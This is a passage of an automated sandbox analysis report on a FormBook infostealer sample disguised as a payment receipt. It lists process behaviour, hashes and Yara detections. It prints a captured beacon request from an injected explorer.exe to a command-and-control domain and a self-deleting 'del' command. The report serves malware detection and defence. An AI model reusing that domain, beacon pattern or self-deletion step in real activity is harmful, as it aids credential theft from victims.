                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      9192.168.2.649836198.54.117.21780C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 27, 2021 17:51:34.243393898 CEST7556OUTGET /b0us/?ER-tHjR=NeMtgU3TUqkyahWOuk7UbKtu2f6OPWemmRyjHCkgk8lKJDy56aFQiEm/TJxXDeQeO1MybhrnKA==&7nB=o48X HTTP/1.1
                                                      Host: www.insularrofioa.xyz
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:


                                                      Code Manipulations

                                                      Statistics

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Start time:17:49:31
                                                      Start date:27/10/2021
                                                      Path:C:\Users\user\Desktop\Betalingskvittering.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\Desktop\Betalingskvittering.exe'
                                                      Imagebase:0x400000
                                                      File size:334436 bytes
                                                      MD5 hash:FF904170AD5767DB6B6066400972CC99
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      General

                                                      Start time:17:49:32
                                                      Start date:27/10/2021
                                                      Path:C:\Users\user\Desktop\Betalingskvittering.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\Desktop\Betalingskvittering.exe'
                                                      Imagebase:0x400000
                                                      File size:334436 bytes
                                                      MD5 hash:FF904170AD5767DB6B6066400972CC99
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      General

                                                      Start time:17:49:37
                                                      Start date:27/10/2021
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0x7ff6f22f0000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:high

                                                      General

                                                      Start time:17:49:57
                                                      Start date:27/10/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\cmd.exe
                                                      Imagebase:0x2a0000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:high

                                                      General

                                                      Start time:17:50:02
                                                      Start date:27/10/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del 'C:\Users\user\Desktop\Betalingskvittering.exe'
                                                      Imagebase:0x2a0000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:17:50:03
                                                      Start date:27/10/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff61de10000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Disassembly

                                                      Code Analysis

                                                      Reset < >